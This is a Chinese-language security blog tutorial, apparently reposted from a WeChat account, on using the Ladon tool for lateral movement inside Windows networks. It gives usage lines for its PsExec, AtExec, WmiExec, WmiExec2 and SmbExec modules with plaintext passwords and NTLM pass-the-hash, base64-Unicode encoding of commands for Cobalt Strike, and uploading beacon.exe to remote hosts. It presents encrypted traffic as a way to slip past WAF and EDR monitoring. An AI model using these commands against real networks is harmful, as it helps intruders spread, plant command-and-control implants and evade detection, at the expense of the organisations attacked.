Ladon横向移动(加密通讯)、Hash传递教程

admin
admin
admin
137996
文章
113
评论
2024年5月14日22:35:21评论34 views字数 2054阅读6分50秒阅读模式

    内网横向移动工具非常多,有各种语言实现的wmi、smb、psexec等,其中最常用的当属微软的psexec和impacket工具包,现在psexec早已被很多杀软针对,基本上已经很少使用。那么多工具,为什么Ladon还要重复造轮子,添加这些横向移动模块功能? 只是单纯体积小?功能集成在一个工具?当然不只是以上原因,另一个是,发现网上各类横向移动工具,通信上几乎都不加密,传输全是明文,执行的命令或命令结果,从流量上就可轻易发现攻击者,WAF也可以轻易拦截数据包,非加密通讯的工具能在目标里使用,没有被发现,只能是两个原因,一是WAF或所谓EDR、XDR、MDR等各种牛逼名职的防护软件垃圾,二管理员垃圾。不然这几个非常火的工具在被使用将近20年的情况下,绝对会被防护软件拦截,如果管理员稍微有点水平,抓个包,也能轻易发现攻击者。

加密通讯

先来看下impacket工具包,通讯并没有加密,可看到执行的命令和结果

psexec k8gege/null:K8gege520?@192.168.50.139

Ladon横向移动(加密通讯)、Hash传递教程

psexec k8gege/null:K8gege520?@192.168.50.139

Ladon横向移动(加密通讯)、Hash传递教程

0x001 Ladon PSexec 交互式回显

通讯加密,抓包可看到执行命令、命令结果都是加密的

net use \192.18.50.235 K8gege520? /user:nullLadon psexec 192.168.50.235

Ladon横向移动(加密通讯)、Hash传递教程

0x002 Ladon AtExec 非交互式回显

Ladon AtExec host user pass cmdlineLadon AtExec host user pass cmdline userLadon AtExec  host user pass b64cmd cmdlineLadon AtExec  host user pass b64cmd cmdline user

域用户 明文密码 执行whoami命令

Ladon横向移动(加密通讯)、Hash传递教程

cmd经过Ladon GUI的Base64_Unicode编码,防止CS解析双引号问题

Ladon横向移动(加密通讯)、Hash传递教程

    Ladon的各类横向移动模块或者提权模块如bypassUAC等cmd,均使用base64 Unicode编码,网上工具大部份都是默认base64编码,加密后可能无法执行命令。有些人可能会说为什么非要用unicode,有没一种可能万一你要执行的命令包含非英文字符,普通编码是不是会乱码?到时你又会说,加密后乱码问题,所以之前有些模块没有使用unicode的,下一版本更新,也都统一为Base64 Unicode编码。如calc加密,默认编码结果为Y2FsYw==,使用unicode编码结果为YwBhAGwAYwA=,都是英文字符串,但结果是完全不一样的,所以使用默认base64加密执行不了命令。

Ladon横向移动(加密通讯)、Hash传递教程

0x003 Ladon Wmiexec 非交互式回显

Ladon WmiExec host user pass cmd cmdlineLadon WmiExec host user pass b64cmd cmdline

base64 cmd执行

Ladon横向移动(加密通讯)、Hash传递教程

域用户执行命令,当然也支持b64cmd,大家要举一反三

Ladon横向移动(加密通讯)、Hash传递教程

0x004 Ladon Wmiexec2 非交互式回显 支持Hash传递、文件上传

通过minikatz或其它工具注入hash获取的shell后,在shell上使用pth参数,即可通过hash传递执行命令。

Usage:Ladon WmiExec2 host user pass cmd whoamiLadon WmiExec2 pth host cmd whoamiBase64Cmd for Cobalt StrikeLadon WmiExec2 host user pass b64cmd whoamiLadon WmiExec2 host user pass b64cmd whoamiUpload:Ladon WmiExec2 host user pass upload beacon.exe beacon.exeLadon WmiExec2 pth host upload beacon.exe beacon.exe

base64 cmd执行

Ladon横向移动(加密通讯)、Hash传递教程

wmiexec2 域用户执行命令

Ladon横向移动(加密通讯)、Hash传递教程

0x005 Ladon  SmbExec 无回显、Hash传递

  1. 支持明文密码、ntlm Hash传递执行命令,此模块无回显

  2. 支持b64cmd,使用base64加密cmd,防止CS下双引号等报错

Ladon SmbExec host user pass cmd cmdlineLadon SmbExec host user pass b64cmd cmdlineLadon SmbExec host user Hash cmd cmdlineLadon SmbExec host user Hash b64cmd cmdline

Ladon横向移动(加密通讯)、Hash传递教程

Hash传递执行命令

Ladon横向移动(加密通讯)、Hash传递教程

PS: 在Cobalt Strike插件、LadonShell、PowerShell或其它远控Shell上用法一致,本文就不一一截图演示了。

简明教程252例: https://github.com/k8gege/Ladon

原文始发于微信公众号(K8实验室):Ladon横向移动(加密通讯)、Hash传递教程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日22:35:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ladon横向移动(加密通讯)、Hash传递教程https://cn-sec.com/archives/2064588.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息